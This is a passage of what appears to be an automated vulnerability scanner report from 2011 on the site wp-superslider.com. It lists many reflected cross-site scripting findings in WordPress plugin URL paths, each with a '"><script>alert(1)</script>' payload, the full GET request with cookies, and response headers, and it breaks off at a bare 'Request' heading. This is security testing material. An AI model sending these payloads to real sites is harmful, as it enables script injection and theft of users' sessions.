HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:24 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8644"><script>alert(1)</script>624f801cac1 was submitted in the REST URL parameter 6. This input was echoed as f8644\"><script>alert(1)</script>624f801cac1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/supersliderf8644"><script>alert(1)</script>624f801cac1/ssBase/default/tooltips.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:26 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674546+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674546; expires=Thu, 02-Feb-2012 19:22:26 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:26 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7487f"><script>alert(1)</script>5f527290bee was submitted in the REST URL parameter 7. This input was echoed as 7487f\"><script>alert(1)</script>5f527290bee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase7487f"><script>alert(1)</script>5f527290bee/default/tooltips.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:27 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674548; expires=Thu, 02-Feb-2012 19:22:28 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:28 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d055"><script>alert(1)</script>7ce29bfd1af was submitted in the REST URL parameter 8. This input was echoed as 7d055\"><script>alert(1)</script>7ce29bfd1af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default7d055"><script>alert(1)</script>7ce29bfd1af/tooltips.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:29 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674550+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674550; expires=Thu, 02-Feb-2012 19:22:30 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:30 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4353"><script>alert(1)</script>abe11ab9e4d was submitted in the REST URL parameter 9. This input was echoed as b4353\"><script>alert(1)</script>abe11ab9e4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.cssb4353"><script>alert(1)</script>abe11ab9e4d HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:31 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 332e7"><script>alert(1)</script>e7708e26fdc was submitted in the REST URL parameter 1. This input was echoed as 332e7\"><script>alert(1)</script>e7708e26fdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site332e7"><script>alert(1)</script>e7708e26fdc/wp-content/plugins/wp-downloadmanager/download-css.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:31 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674552; expires=Thu, 02-Feb-2012 19:22:32 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:32 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e60"><script>alert(1)</script>55e2caf15cd was submitted in the REST URL parameter 2. This input was echoed as b1e60\"><script>alert(1)</script>55e2caf15cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb1e60"><script>alert(1)</script>55e2caf15cd/plugins/wp-downloadmanager/download-css.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:36 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674556+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674556; expires=Thu, 02-Feb-2012 19:22:36 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adaa5"><script>alert(1)</script>26cdf719bb4 was submitted in the REST URL parameter 3. This input was echoed as adaa5\"><script>alert(1)</script>26cdf719bb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsadaa5"><script>alert(1)</script>26cdf719bb4/wp-downloadmanager/download-css.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:40 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd8c0"><script>alert(1)</script>b8bbb170bdf was submitted in the REST URL parameter 4. This input was echoed as dd8c0\"><script>alert(1)</script>b8bbb170bdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-downloadmanagerdd8c0"><script>alert(1)</script>b8bbb170bdf/download-css.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:42 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ca"><script>alert(1)</script>99896f8538 was submitted in the REST URL parameter 5. This input was echoed as 867ca\"><script>alert(1)</script>99896f8538 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-downloadmanager/download-css.css867ca"><script>alert(1)</script>99896f8538 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35227"><script>alert(1)</script>3dfa69234d3 was submitted in the REST URL parameter 1. This input was echoed as 35227\"><script>alert(1)</script>3dfa69234d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site35227"><script>alert(1)</script>3dfa69234d3/wp-content/plugins/wp-greet-box/js/functions.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:03 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674584; expires=Thu, 02-Feb-2012 19:23:04 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37872"><script>alert(1)</script>78f3e31006f was submitted in the REST URL parameter 2. This input was echoed as 37872\"><script>alert(1)</script>78f3e31006f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content37872"><script>alert(1)</script>78f3e31006f/plugins/wp-greet-box/js/functions.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:05 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f66b5"><script>alert(1)</script>d1bdee06cb7 was submitted in the REST URL parameter 3. This input was echoed as f66b5\"><script>alert(1)</script>d1bdee06cb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsf66b5"><script>alert(1)</script>d1bdee06cb7/wp-greet-box/js/functions.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:06 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6b8"><script>alert(1)</script>914a3271a2e was submitted in the REST URL parameter 4. This input was echoed as ed6b8\"><script>alert(1)</script>914a3271a2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-boxed6b8"><script>alert(1)</script>914a3271a2e/js/functions.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:08 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad51d"><script>alert(1)</script>5ca530811f6 was submitted in the REST URL parameter 5. This input was echoed as ad51d\"><script>alert(1)</script>5ca530811f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box/jsad51d"><script>alert(1)</script>5ca530811f6/functions.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:09 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ecd"><script>alert(1)</script>b9142a98a09 was submitted in the REST URL parameter 6. This input was echoed as 57ecd\"><script>alert(1)</script>b9142a98a09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
